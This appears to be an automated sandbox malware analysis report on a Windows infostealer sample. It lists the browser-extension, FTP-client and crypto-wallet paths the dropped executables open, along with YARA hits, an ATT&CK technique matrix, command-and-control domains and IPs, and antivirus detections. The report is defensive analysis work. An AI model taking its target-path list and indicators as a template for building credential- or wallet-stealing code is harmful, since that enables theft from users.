                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfo
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetter
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Roaming\FTPbox
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Roaming\FTPRush
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTP
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQY
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQY
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVT
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVT
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHA
                          Source: C:\Users\user\AppData\Local\Temp\1016854001\9f237e29d5.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHA
                          Source: C:\Users\user\AppData\Local\Temp\1016851001\d2cb36d600.exeDirectory queried: number of queries: 1001
                          Source: Yara matchFile source: Process Memory Space: d2cb36d600.exe PID: 7656, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: 9f237e29d5.exe PID: 3060, type: MEMORYSTR

                          Remote Access Functionality

                          barindex
                          Source: Yara matchFile source: Process Memory Space: d2cb36d600.exe PID: 7656, type: MEMORYSTR
                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: 9f237e29d5.exe PID: 3060, type: MEMORYSTR
                          Source: Yara matchFile source: 00000029.00000003.2360437408.00000000029F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000023.00000003.2350989316.0000000001240000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000029.00000002.2372633132.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000023.00000003.2360789090.00000000050A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_0062EC48 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,6_2_0062EC48
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_0062DF51 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::GetInternalContext,6_2_0062DF51
                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity Information1
                          Scripting
                          Valid Accounts3
                          Windows Management Instrumentation
                          1
                          Scripting
                          1
                          DLL Side-Loading
                          11
                          Deobfuscate/Decode Files or Information
                          2
                          OS Credential Dumping
                          2
                          System Time Discovery
                          Remote Services1
                          Archive Collected Data
                          12
                          Ingress Tool Transfer
                          Exfiltration Over Other Network MediumAbuse Accessibility Features
                          CredentialsDomainsDefault Accounts1
                          Native API
                          1
                          DLL Side-Loading
                          512
                          Process Injection
                          31
                          Obfuscated Files or Information
                          21
                          Input Capture
                          23
                          File and Directory Discovery
                          Remote Desktop Protocol41
                          Data from Local System
                          21
                          Encrypted Channel
                          Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain Accounts12
                          Command and Scripting Interpreter
                          11
                          Scheduled Task/Job
                          11
                          Scheduled Task/Job
                          121
                          Software Packing
                          Security Account Manager355
                          System Information Discovery
                          SMB/Windows Admin Shares21
                          Input Capture
                          3
                          Non-Application Layer Protocol
                          Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal Accounts11
                          Scheduled Task/Job
                          Login HookLogin Hook1
                          DLL Side-Loading
                          NTDS1191
                          Security Software Discovery
                          Distributed Component Object ModelInput Capture124
                          Application Layer Protocol
                          Traffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud Accounts2
                          PowerShell
                          Network Logon ScriptNetwork Logon Script11
                          Masquerading
                          LSA Secrets2
                          Process Discovery
                          SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts361
                          Virtualization/Sandbox Evasion
                          Cached Domain Credentials361
                          Virtualization/Sandbox Evasion
                          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items512
                          Process Injection
                          DCSync1
                          Application Window Discovery
                          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                          Remote System Discovery
                          Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                          System Network Configuration Discovery
                          Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1577193 Sample: file.exe Startdate: 18/12/2024 Architecture: WINDOWS Score: 100 108 grannyejh.lat 2->108 110 sweepyribs.lat 2->110 112 pancakedipyps.click 2->112 126 Suricata IDS alerts for network traffic 2->126 128 Found malware configuration 2->128 130 Malicious sample detected (through community Yara rule) 2->130 132 17 other signatures 2->132 11 skotes.exe 26 2->11         started        16 file.exe 5 2->16         started        18 Intel_PTT_EK_Recertification.exe 2->18         started        20 Intel_PTT_EK_Recertification.exe 2->20         started        signatures3 process4 dnsIp5 114 185.215.113.43, 49709, 49710, 49712 WHOLESALECONNECTIONSNL Portugal 11->114 116 31.41.244.11, 49711, 49714, 49720 AEROEXPRESS-ASRU Russian Federation 11->116 96 C:\Users\user\AppData\...\9f237e29d5.exe, PE32 11->96 dropped 98 C:\Users\user\AppData\...\80f68847d3.exe, PE32 11->98 dropped 100 C:\Users\user\AppData\...\95ae71a780.exe, PE32 11->100 dropped 106 5 other malicious files 11->106 dropped 182 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 11->182 184 Hides threads from debuggers 11->184 186 Tries to detect sandboxes / dynamic malware analysis system (registry check) 11->186 188 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 11->188 22 80f68847d3.exe 11->22         started        25 95ae71a780.exe 8 11->25         started        28 9f237e29d5.exe 11->28         started        30 d2cb36d600.exe 1 11->30         started        102 C:\Users\user\AppData\Local\...\skotes.exe, PE32 16->102 dropped 104 C:\Users\user\...\skotes.exe:Zone.Identifier, ASCII 16->104 dropped 190 Detected unpacking (changes PE section rights) 16->190 192 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 16->192 194 Tries to evade debugger and weak emulator (self modifying code) 16->194 196 Tries to detect virtualization through RDTSC time measurements 16->196 32 skotes.exe 16->32         started        198 Antivirus detection for dropped file 18->198 200 Multi AV Scanner detection for dropped file 18->200 202 Suspicious powershell command line found 18->202 204 5 other signatures 18->204 34 powershell.exe 18->34         started        36 explorer.exe 18->36         started        file6 signatures7 process8 file9 136 Detected unpacking (changes PE section rights) 22->136 138 Tries to detect sandboxes and other dynamic analysis tools (window names) 22->138 140 Machine Learning detection for dropped file 22->140 156 5 other signatures 22->156 38 svchost.exe 22->38         started        41 WerFault.exe 22->41         started        88 C:\Users\user\AppData\Local\Temp\...\7z.exe, PE32+ 25->88 dropped 90 C:\Users\user\AppData\Local\Temp\...\7z.dll, PE32+ 25->90 dropped 43 cmd.exe 2 25->43         started        142 Injects a PE file into a foreign processes 28->142 144 LummaC encrypted strings found 28->144 45 9f237e29d5.exe 28->45         started        48 conhost.exe 28->48         started        146 Contains functionality to inject code into remote processes 30->146 50 d2cb36d600.exe 30->50         started        56 2 other processes 30->56 148 Antivirus detection for dropped file 32->148 150 Multi AV Scanner detection for dropped file 32->150 152 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 32->152 154 Tries to detect virtualization through RDTSC time measurements 32->154 52 PING.EXE 34->52         started        54 conhost.exe 34->54         started        signatures10 process11 dnsIp12 158 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 38->158 160 Checks if the current machine is a virtual machine (disk enumeration) 38->160 162 Switches to a custom stack to bypass stack traces 38->162 164 Uses cmd line tools excessively to alter registry or file data 43->164 58 in.exe 43->58         started        62 7z.exe 43->62         started        64 7z.exe 3 43->64         started        66 9 other processes 43->66 118 grannyejh.lat 172.67.179.109, 443, 49727, 49728 CLOUDFLARENETUS United States 45->118 166 Query firmware table information (likely to detect VMs) 45->166 168 Tries to harvest and steal ftp login credentials 45->168 170 Tries to harvest and steal browser information (history, passwords, etc) 45->170 120 pancakedipyps.click 104.21.23.76, 443, 49713, 49715 CLOUDFLARENETUS United States 50->120 172 Found many strings related to Crypto-Wallets (likely being stolen) 50->172 174 Tries to steal Crypto Currency Wallets 50->174 122 127.1.10.1 unknown unknown 52->122 signatures13 process14 file15 92 C:\Users\...\Intel_PTT_EK_Recertification.exe, PE32+ 58->92 dropped 176 Suspicious powershell command line found 58->176 178 Uses cmd line tools excessively to alter registry or file data 58->178 180 Uses schtasks.exe or at.exe to add and modify task schedules 58->180 68 powershell.exe 58->68         started        71 attrib.exe 58->71         started        73 attrib.exe 58->73         started        75 schtasks.exe 58->75         started        94 C:\Users\user\AppData\Local\Temp\...\in.exe, PE32+ 62->94 dropped signatures16 process17 signatures18 134 Uses ping.exe to check the status of other devices and networks 68->134 77 PING.EXE 68->77         started        80 conhost.exe 68->80         started        82 conhost.exe 71->82         started        84 conhost.exe 73->84         started        86 conhost.exe 75->86         started        process19 dnsIp20 124 127.0.0.1 unknown unknown 77->124

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand
                          SourceDetectionScannerLabelLink
                          file.exe56%VirustotalBrowse
                          file.exe100%AviraTR/Crypt.TPM.Gen
                          file.exe100%Joe Sandbox ML
                          SourceDetectionScannerLabelLink
                          C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe100%AviraTR/Crypt.TPM.Gen
                          C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe100%AviraHEUR/AGEN.1352802
